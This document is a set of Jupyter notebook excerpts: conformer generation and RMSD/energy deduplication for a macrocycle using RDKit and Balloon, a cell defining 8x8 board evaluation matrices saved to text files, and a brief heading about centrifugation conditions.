    """Pairwise best-fit RMSD (heavy atoms only) between all conformers in moldict."""
    similarity_matrix = {}
    for k1, m1 in moldict.items():   # loop variable renamed so it no longer shadows the global m13
        for k2, m2 in moldict.items():
            if (k1, k2) in similarity_matrix.keys() or (k2, k1) in similarity_matrix.keys():
                pass
            else:
                if k1 != k2:
                    rms = AllChem.GetBestRMS(Chem.RemoveHs(m1),Chem.RemoveHs(m2))
                    similarity_matrix[(k1, k2)] = rms
    return similarity_matrix
def find_duplicates_in_sorted_similarity_matrix(similarity_matrix_sorted, energy):
similarity_thresh = 0.5 # Angstrom
energy_thresh = 5 # kcal/mol
to_be_deleted = []
for pair in similarity_matrix_sorted:
if pair[1] < similarity_thresh:
conf1 = pair[0][0]
conf2 = pair[0][1]
if abs(energy[conf1] - energy[conf2]) < energy_thresh:
#print("conf1, conf2, E(conf1), E(conf2) = ", conf1, conf2, energy_m13_b[conf1], energy_m13_b[conf2])
if energy[conf1] < energy[conf2]:
to_be_deleted.append(conf2)
else:
to_be_deleted.append(conf1)
else:
# similarity_matrix_b_sorted is sorted, so here we would already start looping over
# pairs for which rmsd is > threshold
# and we do not need to do this, so break
break
return to_be_deleted
def find_duplicates(rms_sorted, energy, rms_thresh):
i = 0
to_be_deleted = []
while i < len(rms_sorted):
j = i + 1
while j < len(rms_sorted):
if rms_sorted[i][0] in to_be_deleted:
i = i + 1
j = j + 1
elif rms_sorted[j][0] in to_be_deleted:
j = j + 1
else:
rms1 = rms_sorted[i][1]
rms2 = rms_sorted[j][1]
if (rms2 - rms1) < rms_thresh:
if energy[rms_sorted[i][0]] < energy[rms_sorted[j][0]]:
to_be_deleted.append(rms_sorted[j][0])
else:
to_be_deleted.append(rms_sorted[i][0])
else:
break
i = i + 1
if to_be_deleted:
print("Conformers which will be deleted:")
print(to_be_deleted)
return to_be_deleted
###Output
_____no_output_____
###Markdown
Crystal structure of "m13" macrocycle
###Code
cm13 = open('/home/gosia/work/work_on_gitlab/icho/calcs/m13/m13_crystal.xyz','r').read()
vcm13 = py3Dmol.view(width=400,height=400)
vcm13.removeAllModels()
vcm13.addModel(cm13,'xyz')
vcm13.setStyle({'stick':{'radius':0.15,'color':'spectrum'}})
vcm13.setBackgroundColor('0xeeeeee')
vcm13.zoomTo()
vcm13.show()
# "core" is a part of a molecule, which we wish to be the "most-aligned" among multiple conformers
smiles = 'N1C(=O)c2cc(C(=O)NCCCCCNC(=O)c3cc(C(=O)NCCCCC1)cc(c3)C(C)(C)C)cc(c2)C(C)(C)C'
core_smiles = '[c]1[c][c][c]c([c]1)C([C])([C])[C]'
m13 = Chem.AddHs(Chem.MolFromSmiles(smiles))
core_m13 = m13.GetSubstructMatch(Chem.MolFromSmiles(core_smiles))
templ_m13 = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/m13_crystal.sdf')
m13_crystal = templ_m13[0]
###Output
_____no_output_____
###Markdown
Conformers generated with the Balloon software:

Conformers were generated in the Balloon software with the following starting structures:

* the crystal geometry (3D), results with prefix "m13_b_sdf"; the crystal is of the "ss-ss" type;
* the SMILES signature of m13 ("0D"); the program was allowed to "rebuild the geometry" (option "--rebuildGeometry"), results with prefix "m13_b_smi";
* 3D structures generated in Avogadro (from the crystal geometry and pre-optimized) of the:
  * "ss_sa" type
  * "ss_aa" type
  * "sa_sa" type
  * "sa_as" type
  * "sa_aa" type
  * "aa_aa" type

where "ss\_sa" means "(ring1: syn-syn)\_(ring2: syn-anti)" configuration of the amide groups, paired by the neighbouring aromatic ring, etc.

In all cases the Balloon software was asked to generate 100 conformers using the genetic algorithm with default settings (only "maxPostprocessIter" increased to 150 and "nGenerations" to 300). The generated conformer structures are presented in a separate notebook: [link](http://nbviewer.jupyter.org/github/gosiao/icho-notebooks/blob/master/conformers_m13_suppl1.ipynb).
###Code
inps_m13_b_sdf = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_crystalsdf/*.sdf')
inps_m13_b_smi = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_crystalsmiles/*.sdf')
inps_m13_b_ss_sa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_m13_ss_sa/*.sdf')
inps_m13_b_ss_aa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_m13_ss_aa/*.sdf')
inps_m13_b_sa_sa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_m13_sa_sa/*.sdf')
inps_m13_b_sa_as = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_m13_sa_as/*.sdf')
inps_m13_b_sa_aa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_m13_sa_aa/*.sdf')
inps_m13_b_aa_aa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/results_starting_from_m13_aa_aa/*.sdf')
e_m13_b_sdf = grep_energies_from_sdf_outputs(inps_m13_b_sdf)
e_m13_b_smi = grep_energies_from_sdf_outputs(inps_m13_b_smi)
e_m13_b_ss_sa = grep_energies_from_sdf_outputs(inps_m13_b_ss_sa)
e_m13_b_ss_aa = grep_energies_from_sdf_outputs(inps_m13_b_ss_aa)
e_m13_b_sa_sa = grep_energies_from_sdf_outputs(inps_m13_b_sa_sa)
e_m13_b_sa_as = grep_energies_from_sdf_outputs(inps_m13_b_sa_as)
e_m13_b_sa_aa = grep_energies_from_sdf_outputs(inps_m13_b_sa_aa)
e_m13_b_aa_aa = grep_energies_from_sdf_outputs(inps_m13_b_aa_aa)
# write conformers to dictionaries
suppl_m13_b_sdf = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_crystal_sdfout.sdf')
suppl_m13_b_smi = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_crystal_smilesout.sdf')
suppl_m13_b_ss_sa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_ss_sa_sdfout.sdf')
suppl_m13_b_ss_aa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_ss_aa_sdfout.sdf')
suppl_m13_b_sa_sa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_sa_sa_sdfout.sdf')
suppl_m13_b_sa_as = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_sa_as_sdfout.sdf')
suppl_m13_b_sa_aa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_sa_aa_sdfout.sdf')
suppl_m13_b_aa_aa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/balloon/m13_aa_aa_sdfout.sdf')
allmol_m13_b_sdf = write_to_dict("m13_b_sdf_", suppl_m13_b_sdf)
allmol_m13_b_smi = write_to_dict("m13_b_smi_", suppl_m13_b_smi)
allmol_m13_b_ss_sa = write_to_dict("m13_b_ss_sa_", suppl_m13_b_ss_sa)
allmol_m13_b_ss_aa = write_to_dict("m13_b_ss_aa_", suppl_m13_b_ss_aa)
allmol_m13_b_sa_sa = write_to_dict("m13_b_sa_sa_", suppl_m13_b_sa_sa)
allmol_m13_b_sa_as = write_to_dict("m13_b_sa_as_", suppl_m13_b_sa_as)
allmol_m13_b_sa_aa = write_to_dict("m13_b_sa_aa_", suppl_m13_b_sa_aa)
allmol_m13_b_aa_aa = write_to_dict("m13_b_aa_aa_", suppl_m13_b_aa_aa)
###Output
_____no_output_____
###Markdown
pre-screening

All generated structures are pre-optimized with MM methods (MMFF94-like force field). To remove potential duplicates, we will:

* calculate the root-mean-square deviation (RMSD) between pairs of conformers (taking into account non-hydrogen atoms only);
* compare the energies of conformers from pairs which are found to be similar (RMSD lower than the threshold);
* if these energies are too similar (the difference lower than the threshold), remove the conformer which has the higher energy value.
###Code
allmol_m13_b = {}
allmol_m13_b.update(allmol_m13_b_sdf)
allmol_m13_b.update(allmol_m13_b_smi)
allmol_m13_b.update(allmol_m13_b_ss_sa)
allmol_m13_b.update(allmol_m13_b_ss_aa)
allmol_m13_b.update(allmol_m13_b_sa_sa)
allmol_m13_b.update(allmol_m13_b_sa_as)
allmol_m13_b.update(allmol_m13_b_sa_aa)
allmol_m13_b.update(allmol_m13_b_aa_aa)
print("The total number of generated conformers (before the duplicates removal) = ", len(allmol_m13_b))
energy_m13_b = {}
energy_m13_b.update(e_m13_b_sdf)
energy_m13_b.update(e_m13_b_smi)
energy_m13_b.update(e_m13_b_ss_sa)
energy_m13_b.update(e_m13_b_ss_aa)
energy_m13_b.update(e_m13_b_sa_sa)
energy_m13_b.update(e_m13_b_sa_as)
energy_m13_b.update(e_m13_b_sa_aa)
energy_m13_b.update(e_m13_b_aa_aa)
# 1. calculate the similarity matrix between all pairs of conformers and sort its elements from the lowest
# (the most similar structures) to the largest values (the most different structures)
similarity_matrix_b = make_similarity_matrix(allmol_m13_b)
similarity_matrix_b_sorted = sorted(similarity_matrix_b.items(), key=lambda x: x[1])
# 2. remove duplicates:
# for all pairs of structures, for which the similarity value is lower than threshold ("similarity_thresh"),
# compare energies; then if the energies are similar (controlled by the "energy_thresh"),
#then remove the one with higher energy
to_be_deleted = find_duplicates_in_sorted_similarity_matrix(similarity_matrix_b_sorted, energy_m13_b)
for mol in to_be_deleted:
#print("to_be_deleted: ", mol)
to_be_deleted_keys = list(k for k in similarity_matrix_b.keys() if mol in k)
for k in to_be_deleted_keys:
del similarity_matrix_b[k]
allmol_m13_b.pop(mol, None)
energy_m13_b.pop(mol, None)
print("We have removed potential conformer duplicates.")
print("The final number of remaining conformers = ", len(allmol_m13_b))
print("Below we present all the remaining conformers aligned (to one aromatic ring).")
align_structures_to_lowest_energy(allmol_m13_b, energy_m13_b)
p_b = prepare_view(allmol_m13_b)
p_b.show()
print("Sorted energy of all selected conformers and the energy differences with respect to the lowest:")
energy_b_sorted = sorted(energy_m13_b.items(), key=lambda x: x[1])
energy_b_diff = []
e_b_min = energy_b_sorted[0][1]
for e in energy_b_sorted:
e_diff = e[1] - e_b_min
energy_b_diff.append([e[0], e[1], e_diff])
e_b_df = pd.DataFrame(energy_b_diff, columns=["conformer", "E", "E - Emin"])
e_b_df
###Output
Sorted energy of all selected conformers and the energy differences with respect to the lowest:
###Markdown
Conformers generated with the RDKit software:

Conformers were generated in the RDKit software with the following starting structures:

* the crystal geometry (3D), results with prefix "m13_rdkit_sdf"; the crystal is of the "ss-ss" type;
* the SMILES signature of m13 ("0D"), results with prefix "m13_rdkit_smi";
* 3D structures generated in Avogadro (from the crystal geometry and pre-optimized) of the:
  * "ss_sa" type
  * "ss_aa" type
  * "sa_sa" type
  * "sa_as" type
  * "sa_aa" type
  * "aa_aa" type

where "ss\_sa" means "(ring1: syn-syn)\_(ring2: syn-anti)" configuration of the amide groups, paired by the neighbouring aromatic ring, etc.

In all cases the RDKit software was asked to generate 100 conformers using the distance geometry algorithm with default settings (only "pruneRmsThresh" set to 1.0 in "AllChem.EmbedMultipleConfs" and "maxIters" set to 500 or 700 (when needed) in "AllChem.UFFOptimizeMolecule"). The generated conformer structures are presented in a separate notebook: [link](http://nbviewer.jupyter.org/github/gosiao/icho-notebooks/blob/master/conformers_m13_suppl1.ipynb).
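For reference, a minimal sketch of the generation protocol described above (parameter values as stated; the function name is illustrative, since the production runs were done with scripts outside this notebook):
###Code
def generate_conformers_uff(mol_in, n_confs=100, prune_rms=1.0, max_iters=500):
    """Embed conformers with distance geometry and relax each one with UFF."""
    mol = Chem.AddHs(Chem.Mol(mol_in))  # work on a copy, with explicit hydrogens
    conf_ids = AllChem.EmbedMultipleConfs(mol, numConfs=n_confs, pruneRmsThresh=prune_rms)
    for cid in conf_ids:
        AllChem.UFFOptimizeMolecule(mol, confId=cid, maxIters=max_iters)
    return mol

# example (kept small so it runs quickly):
# confs = generate_conformers_uff(Chem.MolFromSmiles(smiles), n_confs=5)
###Output
_____no_output_____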
###Code
inps_m13_rdkit_smi = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_crystal_from_smiles/*.sdf')
inps_m13_rdkit_sdf = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_crystal_from_sdf/*.sdf')
inps_m13_rdkit_ss_sa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_from_m13_ss_sa/*.sdf')
inps_m13_rdkit_ss_aa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_from_m13_ss_aa/*.sdf')
inps_m13_rdkit_sa_sa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_from_m13_sa_sa/*.sdf')
inps_m13_rdkit_sa_as = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_from_m13_sa_as/*.sdf')
inps_m13_rdkit_sa_aa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_from_m13_sa_aa/*.sdf')
inps_m13_rdkit_aa_aa = glob.glob('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/results_from_m13_aa_aa/*.sdf')
e_m13_rdkit_smi = grep_energies_from_sdf_outputs(inps_m13_rdkit_smi)
e_m13_rdkit_sdf = grep_energies_from_sdf_outputs(inps_m13_rdkit_sdf)
e_m13_rdkit_ss_sa = grep_energies_from_sdf_outputs(inps_m13_rdkit_ss_sa)
e_m13_rdkit_ss_aa = grep_energies_from_sdf_outputs(inps_m13_rdkit_ss_aa)
e_m13_rdkit_sa_sa = grep_energies_from_sdf_outputs(inps_m13_rdkit_sa_sa)
e_m13_rdkit_sa_as = grep_energies_from_sdf_outputs(inps_m13_rdkit_sa_as)
e_m13_rdkit_sa_aa = grep_energies_from_sdf_outputs(inps_m13_rdkit_sa_aa)
e_m13_rdkit_aa_aa = grep_energies_from_sdf_outputs(inps_m13_rdkit_aa_aa)
# write conformers to dictionaries
suppl_m13_rdkit_smi = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_smiles.sdf')
suppl_m13_rdkit_sdf = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_sdf.sdf')
suppl_m13_rdkit_ss_sa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_m13_ss_sa.sdf')
suppl_m13_rdkit_ss_aa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_m13_ss_aa.sdf')
suppl_m13_rdkit_sa_sa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_m13_sa_sa.sdf')
suppl_m13_rdkit_sa_as = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_m13_sa_as.sdf')
suppl_m13_rdkit_sa_aa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_m13_sa_aa.sdf')
suppl_m13_rdkit_aa_aa = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/rdkit/result_m13_aa_aa.sdf')
allmol_m13_rdkit_smi = write_to_dict("m13_rdkit_smi_", suppl_m13_rdkit_smi)
allmol_m13_rdkit_sdf = write_to_dict("m13_rdkit_sdf_", suppl_m13_rdkit_sdf)
allmol_m13_rdkit_ss_sa = write_to_dict("m13_rdkit_ss_sa_", suppl_m13_rdkit_ss_sa)
allmol_m13_rdkit_ss_aa = write_to_dict("m13_rdkit_ss_aa_", suppl_m13_rdkit_ss_aa)
allmol_m13_rdkit_sa_sa = write_to_dict("m13_rdkit_sa_sa_", suppl_m13_rdkit_sa_sa)
allmol_m13_rdkit_sa_as = write_to_dict("m13_rdkit_sa_as_", suppl_m13_rdkit_sa_as)
allmol_m13_rdkit_sa_aa = write_to_dict("m13_rdkit_sa_aa_", suppl_m13_rdkit_sa_aa)
allmol_m13_rdkit_aa_aa = write_to_dict("m13_rdkit_aa_aa_", suppl_m13_rdkit_aa_aa)
###Output
_____no_output_____
###Markdown
pre-screening

All the generated structures are pre-optimized with MM methods (UFF force field). To remove potential duplicates, we will:

* calculate the root-mean-square deviation (RMSD) between pairs of conformers (taking into account non-hydrogen atoms only);
* compare the energies of conformers from pairs which are found to be similar (RMSD lower than the threshold);
* if these energies are too similar (the difference lower than the threshold), remove the conformer which has the higher energy value.
###Code
allmol_m13_rdkit = {}
allmol_m13_rdkit.update(allmol_m13_rdkit_sdf)
allmol_m13_rdkit.update(allmol_m13_rdkit_smi)
allmol_m13_rdkit.update(allmol_m13_rdkit_ss_sa)
allmol_m13_rdkit.update(allmol_m13_rdkit_ss_aa)
allmol_m13_rdkit.update(allmol_m13_rdkit_sa_sa)
allmol_m13_rdkit.update(allmol_m13_rdkit_sa_as)
allmol_m13_rdkit.update(allmol_m13_rdkit_sa_aa)
allmol_m13_rdkit.update(allmol_m13_rdkit_aa_aa)
print("The total number of generated conformers (before the duplicates removal) = ", len(allmol_m13_rdkit))
energy_m13_rdkit = {}
energy_m13_rdkit.update(e_m13_rdkit_sdf)
energy_m13_rdkit.update(e_m13_rdkit_smi)
energy_m13_rdkit.update(e_m13_rdkit_ss_sa)
energy_m13_rdkit.update(e_m13_rdkit_ss_aa)
energy_m13_rdkit.update(e_m13_rdkit_sa_sa)
energy_m13_rdkit.update(e_m13_rdkit_sa_as)
energy_m13_rdkit.update(e_m13_rdkit_sa_aa)
energy_m13_rdkit.update(e_m13_rdkit_aa_aa)
# 1. calculate the similarity matrix between all pairs of conformers and sort its elements from the lowest
# (the most similar structures) to the largest values (the most different structures)
similarity_matrix_rdkit = make_similarity_matrix(allmol_m13_rdkit)
similarity_matrix_rdkit_sorted = sorted(similarity_matrix_rdkit.items(), key=lambda x: x[1])
# 2. remove duplicates:
# for all pairs of structures, for which the similarity value is lower than threshold ("similarity_thresh"),
# compare energies; then if the energies are similar (controlled by the "energy_thresh"),
#then remove the one with higher energy
to_be_deleted = find_duplicates_in_sorted_similarity_matrix(similarity_matrix_rdkit_sorted, energy_m13_rdkit)
for mol in to_be_deleted:
#print("to_be_deleted: ", mol)
to_be_deleted_keys = list(k for k in similarity_matrix_rdkit.keys() if mol in k)
for k in to_be_deleted_keys:
del similarity_matrix_rdkit[k]
allmol_m13_rdkit.pop(mol, None)
energy_m13_rdkit.pop(mol, None)
print("We have removed potential conformer duplicates.")
print("The final number of remaining conformers = ", len(allmol_m13_rdkit))
print("Below we present all the remaining conformers aligned (to one aromatic ring).")
align_structures_to_lowest_energy(allmol_m13_rdkit, energy_m13_rdkit)
p_rdkit = prepare_view(allmol_m13_rdkit)
p_rdkit.show()
print("Sorted energy of all selected conformers and the energy differences with respect to the lowest:")
energy_rdkit_sorted = sorted(energy_m13_rdkit.items(), key=lambda x: x[1])
energy_rdkit_diff = []
e_rdkit_min = energy_rdkit_sorted[0][1]
for e in energy_rdkit_sorted:
e_diff = e[1] - e_rdkit_min
energy_rdkit_diff.append([e[0], e[1], e_diff])
e_rdkit_df = pd.DataFrame(energy_rdkit_diff, columns=["conformer", "E", "E - Emin"])
e_rdkit_df
###Output
Sorted energy of all selected conformers and the energy differences with respect to the lowest:
###Markdown
Summary

Now let's generate a list of all conformers (from all programs used) and align them. These conformers will further be used as starting points in DFT geometry optimizations.
###Code
allmol_m13 = {}
allmol_m13.update(allmol_m13_b)
allmol_m13.update(allmol_m13_rdkit)
energy_m13 = {}
energy_m13.update(energy_m13_b)
energy_m13.update(energy_m13_rdkit)
###Output
_____no_output_____
###Markdown
The total number of conformers is:
###Code
print(len(allmol_m13))
align_structures_to_lowest_energy(allmol_m13, energy_m13)
p_all = prepare_view(allmol_m13)
p_all.show()
#Write the selected conformers' names to the list "list_selected_conformers_from_balloon_rdkit".
# It will be used to generate Gaussian inputs:
with open("/home/gosia/work/work_on_gitlab/icho/calcs/m13/list_selected_conformers_from_ballon_rdkit", "w") as f:
for key, mol in allmol_m13.items():
f.write(key+"\n")
energy_sorted = sorted(energy_m13.items(), key=lambda x: x[1])
with open("/home/gosia/work/work_on_gitlab/icho/calcs/m13/detailed_list_selected_conformers_from_ballon_rdkit", "w") as f:
for pair in energy_sorted:
f.write("{0:30} {1}\n".format(pair[0], pair[1]))
###Output
_____no_output_____ |
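###Markdown
For the subsequent DFT step, a minimal sketch (the output directory name is illustrative) for writing each selected conformer to its own SDF file, from which the Gaussian inputs can be generated:
###Code
out_dir = '/home/gosia/work/work_on_gitlab/icho/calcs/m13/selected_conformers'  # illustrative path
if not os.path.exists(out_dir):
    os.makedirs(out_dir)
for key, mol in allmol_m13.items():
    writer = Chem.SDWriter(os.path.join(out_dir, key + '.sdf'))
    writer.write(mol)
    writer.close()
###Output
_____no_output_____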
sita/genetic_sur/01/creat_eva.ipynb | ###Markdown
80~100, 615~635
###Code
eva = []
name = []
name_ele = "normal"
eva_ele = [
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
]
name.append(name_ele)
eva.append(eva_ele)
# 13
name_ele = "custom"
eva_ele = [
[1.0, 0.1, 0.5, 0.1, 0.1, 0.1, 0.1, 1.0],
[0.1, 0.5, 0.1, 0.1, 0.1, 0.1, 0.5, 0.1],
[0.1, 0.1, 0.5, 0.1, 0.1, 0.5, 0.1, 0.1],
[0.1, 0.1, 0.1, 0.5, 0.5, 0.1, 0.1, 0.1],
[0.1, 0.1, 0.1, 0.5, 0.5, 0.1, 0.1, 0.1],
[0.1, 0.1, 0.5, 0.1, 0.1, 0.5, 0.1, 0.1],
[0.1, 0.5, 0.1, 0.1, 0.1, 0.1, 0.5, 0.1],
[1.0, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 1.0]
]
name.append(name_ele)
eva.append(eva_ele)
# 20
name_ele = "eva_my"
eva_ele = [
[ 1.0, -1.0, 0.5, 0.1, 0.1, 0.5, -1.0, 1.0],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 0.5, 0.1, 0.5, 0.1, 0.1, 0.5, 0.1, 0.5],
[ 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1],
[ 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1],
[ 0.5, 0.1, 0.5, 0.1, 0.1, 0.5, 0.1, 0.5],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 1.0, -1.0, 0.5, 0.1, 0.1, 0.5, -1.0, 1.0]
]
name.append(name_ele)
eva.append(eva_ele)
name_ele = "corner"
eva_ele = [
[ 1.0, -1.0, 0.5, 0.5, 0.5, 0.5, -1.0, 1.0],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 0.5, 0.1, 0.5, 0.1, 0.1, 0.5, 0.1, 0.5],
[ 0.5, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.5],
[ 0.5, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.5],
[ 0.5, 0.1, 0.5, 0.1, 0.1, 0.5, 0.1, 0.5],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 1.0, -1.0, 0.5, 0.5, 0.5, 0.5, -1.0, 1.0]
]
name.append(name_ele)
eva.append(eva_ele)
name_ele = "box"
eva_ele = [
[ 1.0, -1.0, 0.5, 0.1, 0.1, 0.5, -1.0, 1.0],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 0.5, 0.1, 1.0, 0.1, 0.1, 1.0, 0.1, 0.5],
[ 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1],
[ 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1],
[ 0.5, 0.1, 1.0, 0.1, 0.1, 1.0, 0.1, 0.5],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 1.0, -1.0, 0.5, 0.1, 0.1, 0.5, -1.0, 1.0]
]
name.append(name_ele)
eva.append(eva_ele)
name_ele = "box_corner"
eva_ele = [
[ 1.0, -1.0, 0.5, 0.5, 0.5, 0.5, -1.0, 1.0],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 0.5, 0.1, 1.0, 0.1, 0.1, 1.0, 0.1, 0.5],
[ 0.5, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.5],
[ 0.5, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.5],
[ 0.5, 0.1, 1.0, 0.1, 0.1, 1.0, 0.1, 0.5],
[-1.0, -1.0, 0.1, 0.1, 0.1, 0.1, -1.0, -1.0],
[ 1.0, -1.0, 0.5, 0.5, 0.5, 0.5, -1.0, 1.0]
]
name.append(name_ele)
eva.append(eva_ele)
name_ele = "weak"
eva_ele = [
[-1.0, 1.0, -0.5, -0.1, -0.1, -0.5, 1.0, -1.0],
[ 1.0, 1.0, -0.1, -0.1, -0.1, -0.1, 1.0, 1.0],
[-0.5, -0.1, -0.5, -0.1, -0.1, -0.5, -0.1, -0.5],
[-0.1, -0.1, -0.1, -0.1, -0.1, -0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1, -0.1, -0.1, -0.1, -0.1, -0.1],
[-0.5, -0.1, -0.5, -0.1, -0.1, -0.5, -0.1, -0.5],
[ 1.0, 1.0, -0.1, -0.1, -0.1, -0.1, 1.0, 1.0],
[-1.0, 1.0, -0.5, -0.1, -0.1, -0.5, 1.0, -1.0]
]
name.append(name_ele)
eva.append(eva_ele)
# 15
name_ele = "fifteen"
eva_ele = [
[ 0.2, -0.2, 0.3, -0.9, -0.2, 0.5, 0.5, -0.5],
[ 0.9, 0.9, -0.4, 0.3, 0.8, -0.5, 0.4, -0.6],
[ 0.9, -1.0, -0.3, 0.8, 0.1, -0.1, -0.9, 0.8],
[-0.8, 0.6, 0.1, -0.2, 0.8, -0.7, 0.1, 0.4],
[ 0.3, 0.9, 1.0, 0.4, -0.7, -0.7, 0.7, -0.1],
[ 0.2, 0.7, 0.6, -0.1, -0.1, -0.5, -0.9, 0.2],
[ 0.0, 0.0, 0.8, 0.3, -0.3, 0.6, 0.6, -0.7],
[-0.3, 0.2, -0.9, 1.0, 0.0, 0.5, -0.2, -0.1]
]
name.append(name_ele)
eva.append(eva_ele)
# 17
name_ele = "seventeen"
eva_ele = [
[ 0.6, 0.6, 0.7, 0.1, -0.8, -0.8, -0.4, -0.4],
[ 0.0, 0.5, -0.7, -0.1, 0.1, 0.2, 0.5, 0.4],
[ 0.8, -0.4, -0.4, -0.4, 0.3, -0.9, -0.9, 0.8],
[-0.4, 0.9, 0.2, 0.8, -0.3, -0.7, 0.7, -0.9],
[-0.4, 0.1, 0.6, 0.1, -0.4, 0.8, 1.0, 0.9],
[ 1.0, 0.3, 0.3, -0.3, -0.2, -0.4, -0.7, 0.1],
[ 0.1, 0.3, 0.7, 0.4, -0.6, 0.3, -0.8, 0.9],
[ 0.4, 0.2, 0.8, -1.0, 0.4, -0.7, -0.9, -0.6]
]
name.append(name_ele)
eva.append(eva_ele)
# 21
name_ele = "twenty"
eva_ele = [
[-0.4, 0.2, -0.4, 0.1, 0.9, 0.9, 0.9, 0.3],
[ 0.2, 0.3, -0.8, -0.4, -0.4, 0.9, -0.2, 1.0],
[ 0.2, 0.4, -0.3, 0.4, 0.2, -0.5, 0.5, -0.5],
[-0.4, 0.6, -0.2, -0.3, -0.7, 0.4, -0.9, -0.1],
[-0.4, -0.3, 1.0, -0.5, -0.4, 0.9, 0.8, 0.8],
[ 0.2, 1.0, -0.6, 0.8, 0.9, 0.3, 0.8, 0.1],
[-0.4, -0.5, -0.5, 0.9, 0.0, -0.9, -0.6, 0.5],
[ 0.6, 0.2, -0.8, -0.1, 0.4, 0.9, -0.8, 0.5]
]
name.append(name_ele)
eva.append(eva_ele)
# Persist the evaluation boards: each 8x8 matrix is flattened to 64 lines,
# one value per line, in the same order as the name list.
with open("eva_file.txt", "w") as eva_file:
    for i in range(len(eva)):
        for j in range(8):
            for k in range(8):
                eva_file.write(str(eva[i][j][k]))
                eva_file.write("\n")

# Persist the board names, one per line, matching the order of eva_file.txt.
with open("name_file.txt", "w") as name_file:
    for i in range(len(name)):
        name_file.write(name[i])
        name_file.write("\n")
###Output
_____no_output_____ |
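###Markdown
A minimal sketch for reading the two files back and restoring the 8x8 matrices (it mirrors the write format above: one value per line, 64 lines per board, names in the same order):
###Code
import numpy as np

with open("name_file.txt") as f:
    names = [line.strip() for line in f if line.strip()]

with open("eva_file.txt") as f:
    values = [float(line) for line in f if line.strip()]

boards = np.array(values).reshape(len(names), 8, 8)
print(names[0])
print(boards[0])
###Output
_____no_output_____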
ipynb/theory/standard_vs_our_conditions.ipynb | ###Markdown
Description

* Determining how the isopycnic centrifugation (cfg) conditions used here differ in meaningful ways from those of Clay et al., 2003. Eur Biophys J
